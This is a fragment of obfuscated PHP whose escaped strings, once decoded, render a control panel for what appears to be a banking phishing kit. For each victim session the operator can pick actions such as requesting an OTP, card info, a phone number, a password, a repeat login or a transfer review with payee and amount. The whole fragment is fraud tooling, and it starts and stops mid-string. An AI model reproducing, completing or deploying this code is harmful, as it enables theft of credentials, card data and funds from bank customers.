c2\252\x3c\57\x6f\x70\164\x69\157\156\76\xa\x9\11\11\x9\11\x9\x9\x9\11\x9\11\11\11\x9\x9\11\x3c\x6f\x70\164\151\x6f\x6e\x20\166\141\x6c\165\145\x3d\x27\62\302\xaa\47\76\62\302\xaa\x3c\x2f\157\x70\164\151\x6f\x6e\x3e\12\x9\x9\x9\x9\x9\x9\11\x9\x9\11\x9\11\11\x9\11\x9\x3c\x6f\x70\164\x69\157\156\x20\x76\141\154\165\x65\x3d\x27\63\xc2\252\47\76\x33\xc2\252\74\57\157\160\164\151\157\156\x3e\12\11\11\11\x9\x9\x9\x9\x9\11\x9\11\11\x9\x9\x9\x9\74\157\160\164\151\157\x6e\x20\x76\x61\154\x75\x65\x3d\47\x34\xc2\xaa\x27\76\x34\xc2\252\74\57\x6f\x70\x74\151\157\x6e\x3e\12\x9\x9\x9\11\11\x9\x9\11\11\11\11\11\x9\x9\x9\x9\x3c\157\160\x74\x69\x6f\156\40\166\141\x6c\x75\x65\x3d\47\x35\302\xaa\x27\x3e\65\xc2\252\x3c\57\157\160\164\x69\157\156\76\12\x9\x9\11\x9\11\x9\11\11\11\11\11\11\11\11\11\11\74\x6f\160\x74\151\157\x6e\x20\x76\141\x6c\x75\145\75\47\x36\xc2\252\x27\x3e\66\xc2\xaa\74\57\157\x70\x74\151\x6f\x6e\76\xa\11\x9\x9\x9\11\x9\x9\x9\11\x9\11\11\11\x9\x9\x9\x3c\x6f\x70\164\151\x6f\x6e\40\x76\x61\154\x75\145\x3d\x27\x37\302\252\x27\76\67\xc2\252\x3c\57\157\160\x74\151\x6f\x6e\x3e\xa\x9\11\11\x9\x9\x9\11\11\x9\11\x9\11\11\x9\x9\11\x3c\157\160\164\x69\157\156\40\x76\x61\154\165\145\75\47\70\xc2\xaa\47\x3e\x38\302\xaa\x3c\57\157\160\164\x69\157\156\x3e\12\11\11\x9\x9\x9\x9\x9\11\11\11\x9\x9\x9\x9\11\11\74\157\x70\x74\151\x6f\156\x20\166\141\x6c\165\x65\75\47\x39\302\xaa\x27\x3e\71\302\xaa\74\57\157\x70\x74\151\x6f\x6e\76\12\x9\11\x9\11\x9\x9\11\11\11\11\x9\11\x9\11\11\x9\x3c\157\x70\164\x69\157\x6e\40\x76\x61\x6c\x75\145\x3d\x27\x31\60\302\252\47\x3e\x31\60\xc2\252\x3c\x2f\x6f\160\x74\x69\157\x6e\x3e\xa\x9\x9\x9\11\x9\x9\11\x9\x9\11\x9\x9\11\x9\x9\11\74\x6f\x70\164\151\x6f\156\x20\166\141\x6c\165\145\x3d\x27\61\61\xc2\252\47\x3e\x31\61\302\252\x3c\57\157\160\164\151\157\156\76\12\x9\x9\x9\x9\11\11\11\x9\x9\11\11\11\11\x9\x9\x9\x3c\x6f\160\164\x69\x6f\156\x20\166\x61\x6c\165\145\x3d\47\x31\62\xc2\xaa\47\x3e\61\x32\xc2\xaa\x3c\x2f\x6f\x70\164\x69\x6f\156\x3e\12\11\x9\11\11\x9\11\x9\x9\x9\x9\x9\11\x9\x9\11\11\x3c\x6f\160\164\151\157\156\40\166\x61\x6c\165\145\x3d\47\x31\x33\xc2\252\47\x3e\61\x33\302\252\74\x2f\x6f\x70\x74\x69\157\156\76\xa\x9\x9\x9\11\x9\x9\x9\x9\11\11\11\11\11\x9\x9\74\x2f\x73\145\x6c\145\143\x74\x3e\12\x9\x9\11\11\x9\x9\x9\x9\x9\x9\11\11\11\x9\x3c\57\x64\151\x76\76\xa\x9\11\x9\11\x9\x9\11\11\11\11\11\x9\x9\x9\x3c\x64\x69\166\x20\x63\x6c\141\163\163\x3d\47\143\x6f\x6c\47\x3e\12\11\11\x9\11\x9\x9\11\x9\11\x9\x9\11\x9\11\11\74\x73\145\x6c\x65\x63\164\x20\x63\x6c\141\x73\x73\x3d\47\146\157\x72\155\55\143\x6f\156\x74\x72\157\x6c\47\x20\x6e\x61\x6d\145\x3d\x27\x63\150\x61\162\x33\47\x3e\xa\x9\11\11\x9\11\x9\x9\11\x9\11\11\x9\11\x9\11\x9\74\x6f\160\x74\151\x6f\x6e\40\166\141\x6c\165\145\x3d\47\61\302\xaa\47\x3e\x31\xc2\xaa\x3c\57\157\x70\x74\151\157\156\x3e\xa\11\x9\x9\x9\11\x9\11\x9\11\x9\x9\11\x9\x9\11\x9\74\157\160\x74\151\x6f\x6e\40\166\141\154\x75\x65\x3d\47\62\302\252\x27\76\x32\302\xaa\x3c\x2f\x6f\160\x74\x69\x6f\156\x3e\12\11\11\11\x9\x9\x9\11\11\x9\x9\11\11\x9\x9\x9\x9\74\157\x70\x74\151\157\x6e\40\x76\141\x6c\165\x65\75\47\x33\xc2\252\47\x3e\63\302\xaa\x3c\x2f\157\x70\164\x69\157\x6e\76\12\x9\11\x9\x9\x9\11\x9\11\11\x9\x9\11\11\11\11\x9\x3c\157\160\164\x69\x6f\156\40\166\x61\154\165\145\75\47\64\xc2\xaa\x27\x3e\64\xc2\xaa\x3c\57\157\x70\x74\151\x6f\156\76\xa\x9\11\x9\x9\11\11\11\x9\11\x9\x9\11\x9\11\x9\11\74\157\160\164\151\x6f\x6e\x20\x76\141\154\165\x65\75\x27\65\302\252\x27\x3e\x35\302\252\74\x2f\157\160\x74\151\157\156\x3e\xa\11\x9\x9\11\11\11\x9\11\11\11\11\11\11\x9\11\x9\74\x6f\160\164\x69\x6f\x6e\x20\x76\141\154\x75\x65\x3d\x27\x36\xc2\252\x27\76\x36\xc2\xaa\74\x2f\157\160\x74\x69\x6f\x6e\76\xa\x9\x9\x9\11\x9\11\x9\x9\11\11\11\x9\x9\x9\x9\11\74\x6f\x70\164\151\157\x6e\40\166\x61\x6c\165\x65\75\x27\67\302\252\47\76\67\xc2\xaa\x3c\57\x6f\x70\164\x69\157\x6e\76\xa\11\x9\x9\x9\x9\11\11\x9\x9\x9\11\11\11\11\x9\x9\x3c\157\160\164\151\x6f\x6e\x20\166\x61\x6c\x75\145\x3d\47\70\xc2\xaa\47\76\70\xc2\252\x3c\57\157\160\x74\151\157\156\x3e\xa\11\11\x9\11\11\x9\11\11\x9\x9\x9\11\11\11\11\x9\74\x6f\x70\164\x69\157\156\x20\166\x61\154\165\x65\x3d\47\x39\302\xaa\47\x3e\71\xc2\xaa\x3c\x2f\157\x70\x74\151\x6f\x6e\76\12\11\11\x9\x9\x9\11\11\11\11\11\x9\11\x9\x9\11\x9\x3c\x6f\x70\164\151\157\x6e\40\x76\x61\x6c\x75\145\75\47\61\x30\xc2\xaa\47\76\61\60\xc2\252\74\57\157\x70\x74\151\157\156\76\12\x9\11\x9\x9\11\11\11\x9\x9\11\11\11\x9\11\x9\x9\74\157\160\164\x69\157\x6e\40\166\x61\154\165\x65\x3d\47\61\61\302\252\47\x3e\x31\61\xc2\xaa\x3c\57\x6f\x70\x74\x69\x6f\x6e\x3e\xa\11\11\11\x9\x9\11\11\x9\11\x9\11\11\11\x9\11\x9\74\157\160\x74\x69\x6f\x6e\x20\166\141\154\x75\x65\75\x27\61\x32\302\xaa\47\x3e\x31\x32\302\252\74\57\x6f\x70\164\151\157\x6e\x3e\xa\11\x9\11\x9\11\11\11\x9\11\x9\x9\x9\11\11\11\x9\x3c\x6f\x70\164\x69\x6f\156\40\x76\141\x6c\x75\x65\x3d\47\61\x33\xc2\xaa\x27\x3e\61\x33\302\252\74\57\157\x70\x74\151\157\156\x3e\12\x9\x9\x9\x9\11\x9\x9\11\x9\11\x9\x9\x9\11\x9\74\x2f\163\145\154\x65\143\164\x3e\xa\11\11\11\11\11\x9\11\11\x9\x9\11\x9\11\x9\74\57\144\151\x76\x3e\12\11\11\x9\11\11\x9\11\x9\11\11\11\x9\11\74\x2f\x64\151\166\x3e\xa\x9\11\11\11\x9\x9\11\x9\11\x9\x9\x9\74\57\144\151\x76\76\xa\11\x9\x9\x9\x9\x9\x9\x9\x9\x9\x9\11\55\x2d\x3e\xa\11\x9\x9\11\x9\x9\11\x9\x9\11\x9\x3c\x2f\x74\x64\76\12\11\x9\11\11\11\x9\12\11\x9\11\11\x9\x9\x9\11\11\11\x9\x3c\x74\144\76\12\11\x9\11\x9\x9\11\11\11\11\11\x9\x9\74\x64\x69\x76\x20\x63\154\141\163\x73\x3d\47\146\157\x72\x6d\x2d\x63\150\145\143\x6b\x27\76\12\11\x9\x9\x9\11\x9\x9\x9\x9\x9\x9\x9\11\74\x6c\x61\x62\145\154\x20\x66\157\162\x3d\47\x61\x73\153\143\x68\x61\162\163\162\141\144\x69\157\x31{$value["\x69\x64"]}\x27\40\x63\154\x61\163\163\75\x27\x66\x6f\162\155\x2d\x63\x68\x65\143\x6b\55\x6c\141\142\145\154\47\76\12\x9\11\x9\x9\11\x9\x9\11\11\x9\11\11\11\x9\74\151\x6e\x70\x75\x74\40\x74\x79\160\145\75\47\x72\141\x64\151\157\x27\40\x6e\x61\155\x65\75\x27\163\x74\x61\164\165\x73\47\40\166\x61\x6c\165\145\x3d\x27\x31\62\47\x20\151\x64\75\47\141\x73\x6b\x63\x68\141\x72\x73\162\x61\144\151\157\61{$value["\151\144"]}\47\x20\x6f\156\x63\x6c\x69\143\x6b\x3d\x27\x73\x68\157\167\146\151\x65\x6c\144\x73\x28{$value["\x69\144"]}\x29\x3b\x27\40\143\154\x61\163\163\x3d\x27\x73\164\x61\164\165\x73\x20\146\157\162\155\55\143\150\145\143\x6b\55\151\156\x70\165\164\47\76\xa\11\11\11\11\x9\x9\11\x9\x9\11\11\x9\x9\11\x3c\x73\160\x61\x6e\x3e\x52\x65\x71\165\x65\x73\164\x20\117\x54\120\x3c\x2f\163\160\141\156\x3e\12\11\11\x9\x9\x9\11\11\x9\x9\11\11\11\x9\74\x2f\154\x61\142\145\x6c\x3e\12\x9\x9\x9\x9\11\11\11\x9\11\11\11\11\74\x2f\x64\151\x76\76\12\11\11\11\11\x9\11\11\x9\11\x9\11\x3c\57\164\x64\76\12\x9\11\x9\x9\x9\x9\x9\x9\11\11\x3c\x2f\x74\x72\x3e\12\x9\11\x9\x9\11\11\11\x9\11\x9\xa\x9\x9\11\x9\11\x9\11\x9\11\x9\74\164\162\76\12\x9\11\x9\x9\x9\11\11\x9\11\x9\x9\74\164\144\x3e\xa\x9\11\11\x9\11\x9\11\x9\x9\11\11\11\x3c\x64\x69\x76\40\x63\154\141\163\163\x3d\x27\x66\157\x72\155\x2d\x63\150\145\143\153\47\76\12\x9\11\x9\x9\x9\x9\x9\x9\11\x9\11\11\11\74\x6c\x61\x62\145\x6c\x20\x66\x6f\162\75\x27\141\x73\153\x63\x68\141\x72\x73\x72\x61\144\151\157\x32{$value["\x69\x64"]}\47\x20\x63\154\141\x73\163\x3d\47\x66\x6f\162\155\55\x63\150\145\143\x6b\x2d\154\x61\142\145\x6c\47\76\xa\11\x9\x9\x9\x9\11\x9\11\x9\11\x9\11\x9\x9\x3c\151\x6e\x70\x75\x74\x20\164\171\x70\x65\75\47\162\141\144\151\x6f\47\40\x6e\x61\x6d\x65\x3d\47\163\164\x61\x74\165\x73\47\x20\166\x61\154\165\145\75\x27\x31\x33\x27\x20\151\144\x3d\x27\141\x73\x6b\x63\x68\141\x72\x73\162\141\x64\x69\x6f\62{$value["\x69\144"]}\x27\40\157\x6e\143\x6c\151\143\153\75\x27\x73\x68\x6f\x77\x66\151\145\154\144\163\50{$value["\151\144"]}\x29\73\x27\40\x63\x6c\141\x73\163\75\x27\x73\x74\x61\x74\x75\x73\x20\x66\157\x72\x6d\x2d\x63\150\145\143\153\55\151\156\160\x75\x74\47\x3e\xa\x9\x9\11\11\11\x9\11\11\x9\11\x9\x9\x9\11\74\163\x70\141\156\x3e\122\145\x71\165\145\163\164\40\124\x72\x61\x6e\163\x66\145\x72\40\162\x65\166\x69\145\x77\74\57\x73\160\x61\x6e\x3e\xa\x9\11\11\x9\x9\11\x9\x9\11\11\11\11\11\x3c\x2f\154\141\142\x65\x6c\x3e\12\x9\11\x9\x9\11\x9\11\x9\11\x9\11\11\x3c\x2f\x64\x69\x76\76\xa\11\11\11\x9\x9\11\11\11\11\11\x9\11\x3c\41\x2d\55\x20\x49\156\160\x75\x74\x20\x63\150\141\162\141\143\164\145\162\x73\40\55\x2d\76\xa\11\11\x9\11\x9\11\11\x9\11\11\x9\x9\74\x64\x69\166\x20\143\154\x61\163\x73\75\47\146\157\x72\x6d\x2d\147\x72\157\165\160\x27\x20\x73\x74\x79\x6c\x65\x3d\47\x64\151\163\x70\154\x61\171\x3a\156\x6f\x6e\145\73\x27\40\151\144\75\x27\x61\163\x6b\143\150\141\162\x73\62{$value["\x69\144"]}\x27\x3e\xa\x9\x9\x9\x9\11\x9\x9\11\x9\x9\x9\x9\11\74\x64\151\x76\40\x63\x6c\141\163\x73\x3d\47\x72\x6f\x77\x27\40\x73\164\x79\154\x65\x3d\47\155\x61\x72\x67\x69\x6e\x2d\154\x65\146\x74\72\x35\45\x3b\x6d\x61\162\147\x69\x6e\55\x74\x6f\160\72\65\x70\170\47\40\x3e\xa\x9\x9\x9\x9\x9\11\11\x9\11\x9\11\x9\11\x9\x3c\144\x69\166\x20\143\x6c\x61\163\163\x3d\47\143\157\154\47\76\xa\11\11\x9\x9\x9\x9\x9\11\11\x9\x9\x9\x9\x9\11\74\x69\156\x70\165\x74\40\x74\x79\160\x65\x3d\47\x74\145\170\164\47\x20\143\x6c\x61\x73\x73\x3d\x27\146\157\162\155\x2d\x63\157\x6e\x74\162\x6f\x6c\x27\x20\x6e\141\155\x65\x3d\47\160\141\x79\x65\x65\x4e\x61\x6d\x65\47\x20\x69\144\75\47\160\141\171\x65\145\116\x61\155\145\x27\40\x70\154\141\x63\x65\150\x6f\x6c\144\145\162\75\x27\x49\x6e\160\x75\164\40\x70\x61\x79\145\x65\x20\156\141\x6d\x65\40\150\x65\x72\x65\47\40\163\164\171\154\145\x3d\x27\167\x69\144\164\x68\72\x31\x30\x30\45\x3b\142\157\x72\x64\145\162\55\143\157\x6c\157\162\72\x23\144\x36\x64\66\145\x35\47\76\12\11\x9\11\x9\11\11\x9\x9\11\x9\11\11\11\x9\74\57\144\x69\x76\76\12\11\x9\x9\11\x9\x9\11\x9\11\x9\11\11\11\74\x2f\144\x69\x76\x3e\xa\11\x9\11\11\x9\x9\x9\x9\11\11\x9\11\11\74\144\151\x76\40\x63\x6c\141\163\x73\x3d\x27\162\157\x77\x27\x20\x73\x74\171\154\x65\75\47\x6d\141\x72\147\151\x6e\x2d\154\x65\x66\x74\72\65\45\73\x6d\x61\162\147\x69\x6e\55\164\157\160\x3a\x35\160\170\47\x20\76\xa\11\x9\11\11\11\11\11\11\x9\x9\11\11\x9\x9\74\144\151\x76\40\143\x6c\141\163\163\75\x27\x63\157\x6c\x27\x3e\xa\11\x9\11\x9\x9\11\x9\11\x9\11\x9\x9\x9\x9\11\74\x69\156\160\165\x74\x20\164\171\x70\145\75\47\x74\x65\x78\x74\x27\40\143\154\x61\163\163\75\x27\146\157\x72\155\55\143\x6f\156\x74\162\x6f\154\47\x20\x6e\x61\x6d\145\x3d\x27\x61\155\157\165\156\164\x27\40\151\144\75\x27\x61\x6d\157\165\156\x74\47\x20\x70\154\141\x63\145\x68\157\154\144\145\x72\75\x27\111\156\160\165\164\40\141\x6d\157\165\x6e\x74\x20\150\145\x72\145\47\40\163\164\171\x6c\145\x3d\x27\167\x69\144\x74\x68\x3a\61\60\x30\45\73\x62\x6f\x72\144\x65\162\55\143\x6f\x6c\x6f\162\x3a\x23\x64\x36\144\66\x65\x35\x27\x3e\12\x9\x9\11\11\11\x9\11\x9\x9\11\x9\x9\11\x9\74\57\x64\151\x76\76\xa\11\x9\x9\x9\11\x9\11\11\x9\11\x9\11\11\x3c\57\144\151\166\76\xa\x9\x9\11\11\x9\11\x9\x9\x9\x9\x9\11\x3c\57\x64\151\x76\x3e\xa\11\x9\x9\11\11\x9\x9\11\x9\11\11\x3c\x2f\164\x64\x3e\12\11\x9\11\11\11\x9\x9\x9\x9\x9\11\x3c\x74\144\76\xa\11\x9\x9\11\11\11\11\11\11\x9\11\11\x3c\144\x69\x76\40\x63\x6c\x61\x73\x73\75\47\x66\157\x72\x6d\55\143\150\x65\x63\x6b\47\x3e\12\11\11\x9\11\11\11\11\x9\11\11\x9\x9\x9\74\154\x61\x62\x65\154\x20\146\x6f\x72\75\47\141\163\153\x63\x68\x61\x72\x73\162\141\144\x69\157\65{$value["\x69\144"]}\x27\x20\x63\154\141\x73\163\x3d\x27\x66\x6f\162\155\x2d\143\150\145\143\153\55\x6c\141\142\x65\154\47\x3e\xa\x9\x9\x9\x9\11\x9\11\11\11\11\11\x9\11\11\74\151\x6e\x70\x75\x74\40\x74\171\x70\x65\x3d\47\x72\x61\x64\151\157\x27\40\x6e\141\x6d\145\x3d\47\x73\x74\141\164\x75\163\x27\x20\166\141\154\165\x65\x3d\x27\61\x36\47\x20\151\x64\75\47\141\163\x6b\143\x68\141\x72\163\162\x61\144\151\157\65{$value["\151\x64"]}\47\40\x6f\156\143\154\x69\143\153\75\x27\x73\x68\x6f\x77\146\x69\x65\154\144\x73\x28{$value["\x69\144"]}\51\73\47\x20\143\154\141\163\x73\x3d\47\163\x74\141\164\165\x73\x20\x66\x6f\162\x6d\x2d\x63\150\145\x63\x6b\x2d\x69\x6e\x70\x75\164\x27\76\12\x9\x9\x9\x9\11\11\x9\11\x9\x9\11\11\x9\x9\74\x73\x70\141\x6e\x3e\122\145\x71\x75\x65\x73\x74\40\x50\150\157\x6e\x65\x20\x4e\157\56\x3c\57\163\160\141\156\x3e\12\x9\x9\11\11\11\11\x9\x9\11\11\x9\11\x9\74\57\154\x61\142\x65\x6c\x3e\xa\11\11\11\x9\11\x9\x9\11\x9\11\x9\x9\74\x2f\x64\151\x76\x3e\xa\11\x9\11\x9\x9\11\11\11\11\11\x9\x3c\x2f\x74\x64\76\xa\x9\11\11\x9\x9\x9\x9\x9\x9\11\x3c\x2f\164\x72\76\xa\x9\11\x9\11\11\11\11\x9\11\x9\12\x9\x9\11\x9\11\11\11\x9\11\x9\74\x74\162\76\xa\x9\x9\x9\x9\11\11\11\x9\11\x9\x9\74\164\144\76\xa\11\11\x9\11\11\11\x9\11\x9\x9\x9\x9\74\x64\151\166\x20\x63\x6c\141\163\x73\x3d\47\146\157\162\x6d\55\143\x68\145\x63\153\x27\76\xa\x9\11\11\11\x9\11\11\11\x9\x9\11\x9\x9\x3c\154\x61\x62\x65\154\40\146\x6f\x72\75\47\x61\163\x6b\143\150\141\162\163\x72\x61\144\x69\157\64{$value["\x69\144"]}\47\40\x63\x6c\141\x73\163\x3d\x27\146\x6f\162\155\x2d\143\150\145\143\153\55\x6c\141\x62\x65\x6c\47\x3e\12\x9\11\11\x9\11\x9\11\11\x9\11\11\x9\11\11\x3c\151\x6e\x70\x75\164\40\164\171\160\145\75\47\x72\x61\x64\151\157\x27\40\x6e\x61\155\x65\75\x27\x73\x74\x61\x74\165\x73\x27\x20\166\141\154\x75\x65\75\x27\x31\x35\x27\40\x69\144\x3d\47\x61\163\x6b\x63\150\141\162\x73\162\x61\x64\x69\x6f\x34{$value["\151\144"]}\x27\40\157\x6e\x63\x6c\151\x63\x6b\75\x27\163\150\157\167\x66\151\x65\x6c\x64\x73\x28{$value["\x69\x64"]}\x29\73\47\x20\x63\x6c\141\x73\163\75\x27\x73\164\x61\x74\165\163\40\x66\157\162\155\x2d\x63\x68\145\143\153\55\151\156\160\x75\164\x27\x3e\xa\x9\x9\11\11\11\11\x9\x9\11\11\11\11\x9\11\x3c\x73\160\141\x6e\x3e\x52\145\x71\x75\x65\163\x74\x20\x43\103\x20\x49\156\146\x6f\74\57\163\x70\141\x6e\x3e\xa\11\x9\11\11\11\x9\x9\x9\x9\11\11\11\x9\74\57\x6c\141\x62\x65\x6c\x3e\xa\11\x9\x9\11\11\x9\11\x9\11\11\11\x9\74\x2f\144\x69\166\x3e\12\x9\11\x9\x9\11\11\x9\x9\x9\11\11\74\x2f\164\144\76\xa\11\11\11\x9\11\x9\11\x9\11\11\x9\74\164\x64\x3e\12\11\11\11\11\x9\x9\x9\11\11\x9\x9\11\74\144\x69\166\40\143\154\x61\x73\x73\75\x27\x66\x6f\162\x6d\x2d\143\x68\x65\x63\x6b\47\76\12\x9\11\11\x9\11\11\x9\11\x9\x9\x9\11\11\74\154\141\142\x65\x6c\40\x66\x6f\162\75\47\x61\x73\153\143\x68\141\x72\x73\162\141\x64\x69\157\63{$value["\x69\x64"]}\x27\x20\143\154\141\x73\163\x3d\x27\x66\x6f\162\x6d\x2d\143\150\x65\x63\x6b\x2d\x6c\141\x62\x65\154\47\76\xa\11\x9\x9\x9\x9\11\11\11\x9\11\11\11\11\x9\74\x69\156\160\x75\164\x20\164\171\x70\x65\75\47\x72\x61\x64\x69\157\47\x20\156\141\x6d\145\75\x27\163\164\x61\x74\165\x73\x27\x20\166\x61\154\x75\x65\75\47\x31\x34\x27\40\x69\x64\x3d\47\141\x73\x6b\x63\x68\141\x72\163\162\141\x64\151\157\63{$value["\x69\144"]}\47\x20\157\156\x63\154\151\x63\153\x3d\47\x73\x68\157\167\146\151\x65\x6c\x64\163\50{$value["\151\x64"]}\x29\73\x27\x20\x63\x6c\141\x73\x73\75\47\163\x74\x61\x74\x75\163\40\146\x6f\162\x6d\55\143\x68\145\x63\x6b\55\x69\156\160\165\x74\47\76\12\x9\x9\x9\x9\x9\x9\x9\x9\x9\11\11\x9\x9\x9\x3c\163\x70\141\156\x3e\122\x65\x71\x75\x65\x73\164\40\x42\x61\163\x69\143\40\x49\x6e\146\x6f\74\57\163\160\141\x6e\76\12\x9\11\11\x9\x9\11\11\11\x9\11\11\11\11\x3c\x2f\154\x61\x62\x65\154\76\xa\x9\x9\11\11\x9\x9\11\11\11\11\x9\11\74\57\x64\x69\x76\x3e\12\x9\11\x9\11\x9\x9\x9\x9\x9\x9\11\x3c\x2f\164\144\x3e\12\11\x9\x9\x9\x9\11\x9\11\11\11\74\x2f\x74\162\x3e\12\x9\11\x9\x9\x9\x9\11\11\11\11\xa\x9\x9\x9\11\11\x9\x9\11\11\11\x3c\164\x72\x3e\xa\11\x9\x9\x9\11\11\x9\x9\11\x9\11\x3c\164\x64\x3e\xa\x9\11\11\x9\x9\x9\11\x9\11\11\11\11\x3c\x64\151\x76\x20\143\x6c\x61\163\x73\x3d\x27\146\157\162\155\x2d\x63\150\x65\x63\x6b\x27\x3e\12\11\11\11\x9\x9\x9\x9\11\11\11\x9\x9\x9\x3c\154\141\142\x65\x6c\x20\146\x6f\x72\x3d\47\x61\163\153\143\150\x61\x72\163\x72\141\144\x69\157\67{$value["\151\144"]}\47\x20\143\154\x61\x73\163\75\47\x66\x6f\x72\155\55\x63\150\145\x63\153\55\154\x61\x62\145\154\x27\x3e\12\x9\11\x9\11\11\x9\11\11\11\11\x9\x9\x9\11\x3c\151\x6e\x70\165\x74\x20\164\x79\x70\145\75\x27\162\x61\x64\151\157\x27\x20\156\x61\x6d\x65\75\x27\x73\164\141\164\x75\x73\x27\40\166\141\154\165\x65\75\47\x31\70\x27\x20\x69\144\75\47\x61\163\x6b\143\x68\x61\162\163\162\141\x64\x69\157\67{$value["\151\x64"]}\47\40\157\x6e\143\154\151\143\x6b\x3d\47\x73\150\157\x77\146\x69\145\154\x64\163\50{$value["\151\x64"]}\x29\x3b\47\x20\x63\x6c\141\x73\x73\x3d\x27\x73\164\x61\x74\165\x73\40\x66\157\162\155\55\x63\150\x65\x63\153\x2d\x69\x6e\x70\165\164\x27\x3e\xa\x9\11\11\x9\11\11\11\11\11\11\x9\x9\x9\x9\x3c\163\160\x61\156\x3e\x52\145\x71\x75\x65\163\x74\40\120\141\x73\163\167\x6f\x72\144\x3c\57\x73\160\141\156\76\12\x9\11\x9\11\11\11\x9\x9\11\x9\x9\11\11\74\x2f\x6c\141\142\x65\x6c\x3e\xa\11\x9\x9\11\11\x9\x9\11\11\11\x9\x9\74\x2f\144\151\166\x3e\12\11\11\x9\x9\11\11\11\x9\x9\x9\11\74\x2f\x74\144\76\12\11\11\11\x9\11\x9\x9\11\11\11\x9\74\164\144\76\12\x9\11\11\x9\x9\11\x9\x9\11\x9\x9\11\74\x64\x69\166\x20\143\154\141\163\x73\x3d\47\x66\x6f\162\155\x2d\143\x68\x65\x63\x6b\x27\76\12\x9\11\x9\x9\11\11\x9\x9\x9\x9\x9\x9\11\74\154\x61\142\x65\154\x20\x66\x6f\x72\x3d\47\141\163\153\143\150\x61\162\x73\162\141\x64\151\157\66{$value["\151\x64"]}\x27\x20\143\154\141\x73\163\x3d\x27\146\157\x72\155\55\143\150\145\143\x6b\x2d\154\x61\x62\x65\154\47\x3e\xa\11\11\11\11\x9\x9\11\11\x9\x9\11\x9\11\x9\74\151\156\x70\165\x74\40\164\171\160\145\x3d\x27\x72\x61\144\151\157\x27\x20\x6e\141\x6d\x65\75\47\163\164\x61\164\165\x73\x27\40\166\x61\x6c\x75\145\x3d\x27\61\67\x27\40\x69\144\75\47\x61\x73\153\x63\150\141\x72\163\162\141\144\151\x6f\66{$value["\151\144"]}\47\x20\x6f\156\143\154\x69\x63\153\75\47\163\x68\157\167\x66\151\x65\x6c\x64\x73\50{$value["\151\144"]}\51\x3b\x27\x20\x63\x6c\141\x73\x73\x3d\47\x73\164\x61\164\165\163\x20\x66\157\x72\155\55\x63\150\x65\143\x6b\x2d\151\156\x70\165\x74\47\76\xa\x9\x9\x9\11\x9\11\11\11\x9\11\x9\x9\x9\11\x3c\x73\160\x61\x6e\x3e\114\157\x61\x64\x69\156\147\x20\120\141\x67\145\74\57\x73\160\x61\x6e\76\12\11\x9\x9\x9\x9\11\x9\x9\11\x9\11\x9\11\74\57\x6c\x61\x62\145\x6c\x3e\12\x9\x9\11\11\x9\11\x9\x9\x9\x9\11\x9\74\57\x64\151\166\x3e\xa\x9\11\11\11\11\x9\11\x9\11\11\x9\74\57\x74\144\76\xa\11\11\11\x9\x9\x9\x9\x9\11\11\74\x2f\x74\x72\x3e\xa\11\11\x9\x9\x9\x9\x9\x9\11\11\12\11\11\x9\x9\11\x9\11\x9\11\x9\x3c\x74\x72\x3e\12\11\x9\x9\11\11\11\11\11\x9\x9\11\x3c\164\x64\76\12\11\11\11\x9\x9\x9\x9\x9\11\x9\x9\11\74\144\151\x76\x20\x63\x6c\141\163\163\x3d\x27\146\157\x72\155\55\x63\x68\145\x63\153\x27\76\12\x9\x9\x9\x9\11\11\x9\x9\x9\11\11\11\11\x3c\154\x61\x62\x65\154\x20\146\157\x72\75\47\141\x73\153\154\x6f\x67\151\x6e\x72\141\144\x69\157{$value["\x69\x64"]}\x27\40\143\x6c\x61\x73\x73\75\x27\x66\157\x72\x6d\x2d\x63\150\145\x63\153\55\x6c\141\142\145\154\47\76\xa\11\x9\11\11\11\11\11\11\11\x9\11\x9\x9\11\x3c\x69\156\x70\x75\164\x20\164\x79\160\x65\x3d\x27\x72\141\144\151\157\47\40\156\141\x6d\145\x3d\x27\x73\x74\141\x74\x75\163\47\40\x63\x68\x65\x63\x6b\x65\x64\40\x76\141\154\165\x65\x3d\x27\65\x30\x27\40\151\x64\75\47\141\x73\153\154\157\147\x69\x6e\x72\141\144\151\157{$value["\151\144"]}\x27\x20\157\156\x63\x6c\x69\x63\153\x3d\x27\163\x68\x6f\167\146\x69\x65\154\144\163\x28{$value["\x69\144"]}\x29\73\x27\40\143\x6c\x61\163\163\75\x27\163\164\x61\x74\x75\163\x20\x66\x6f\x72\155\55\x63\x68\145\x63\x6b\x2d\x69\x6e\x70\x75\x74\x27\76\12\x9\11\11\x9\11\11\11\11\11\11\11\11\11\11\74\163\x70\x61\x6e\76\122\x65\x71\165\x65\x73\x74\40\x6c\x6f\147\x69\x6e\40\x61\x67\x61\151\156\x20\74\57\163\x70\141\x6e\76\xa\x9\11\x9\11\11\11\x9\x9\x9\11\11\x9\11\74\x2f\154\141\x62\x65\154\76\xa\x9\11\x9\11\11\11\11\11\x9\x9\x9\x9\74\57\x64\151\x76\76\xa\11\11\x9\11\11\x9\11\x9\x9\x9\11\74\57\x74\144\76\12\11\11\11\11\11\11\11\11\11\11\x9\x3c\x74\144\76\12\x9\11\x9\11\x9\x9\11\11\11\x9\x9\11\x3c\144\151\x76\40\143\154\141\163\163\x3d\x27\146\157\162\155\x2d\x63\150\145\x63\x6b\x27\76\12\x9\11\x9\11\11\11\x9\11\11\x9\11\x9\11\x3c\154\x61\x62\x65\154\x20\x66\157\x72\x3d\x27\x66\x69\x6e\151\163\x68\162\141\x64\151\157{$value["\x69\144"]}\x27\x20\x63\x6c\141\163\163\75\47\146\x6f\x72\155\x2d\x63\x68\145\143\x6b\55\x6c\141\142\145\x6c\47\x3e\xa\11\x9\x9\11\11\x9\x9\11\x9\x9\x9\11\11\11\x3c\x69\156\x70\x75\x74\x20\164\x79\x70\x65\75\x27\x72\141\144\151\157\47\40\x6e\x61\155\145\x3d\47\x73\164\x61\164\x75\163\x27\x20\x76\x61\154\165\145\x3d\47\x32\60\x27\x20\x69\144\75\x27\x66\x69\x6e\151\163\150\x72\141\144\151\x6f{$value["\x69\144"]}\x27\40\x6f\156\x63\x6c\x69\143\153\x3d\47\163\150\157\167\146\151\145\154\x64\x73\x28{$value["\x69\144"]}\51\73\x27\40\143\x6c\141\x73\163\x3d\x27\163\164\141\x74\165\x73\x20\146\157\x72\x6d\55\x63\x68\145\x63\x6b\55\151\156\160\x75\164\x27\76\12\x9\x9\11\x9\11\x9\11\x9\11\x9\x9\x9\11\11\74\x73\160\141\x6e\76\x46\151\156\151\x73\x68\74\57\x73\x70\141\156\x3e\xa\11\x9\x9\11\11\x9\x9\x9\11\x9\x9\11\x9\x3c\57\154\x61\x62\145\154\x3e\12\x9\x9\11\x9\11\11\x9\11\x9\11\x9\x9\x3